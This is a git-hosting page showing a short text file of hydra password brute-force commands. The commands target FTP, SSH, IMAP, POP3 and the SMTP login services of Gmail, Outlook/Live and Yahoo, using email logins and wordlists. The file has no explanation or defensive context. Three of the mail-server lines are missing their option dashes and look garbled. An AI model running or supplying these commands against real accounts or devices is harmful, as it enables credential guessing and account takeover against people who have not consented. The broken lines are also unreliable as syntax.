shell-scripte-code/hack.txt
Simon Rieger 3b2537c229 hydra
2017-07-04 22:07:21 +02:00

10 lines
684 B
Text
Executable file
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

hydra -l user -x 3:3:a ftp://192.168.43.1
hydra S l Email P /root/Desktop/Wordlist.txt e ns V s 465 smtp.gmail.com smtp
hydra S l Email P /root/Desktop/Wordlist.txt e ns V s 587 smtp.live.com smtp
hydra S l Email P /root/Desktop/Wordlist.txt e ns V s 587 smtp.mail.yahoo.com smtp
hydra -t 1 -l admin -P /root/Desktop/password.lst -vV 192.168.1.1 ftp
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh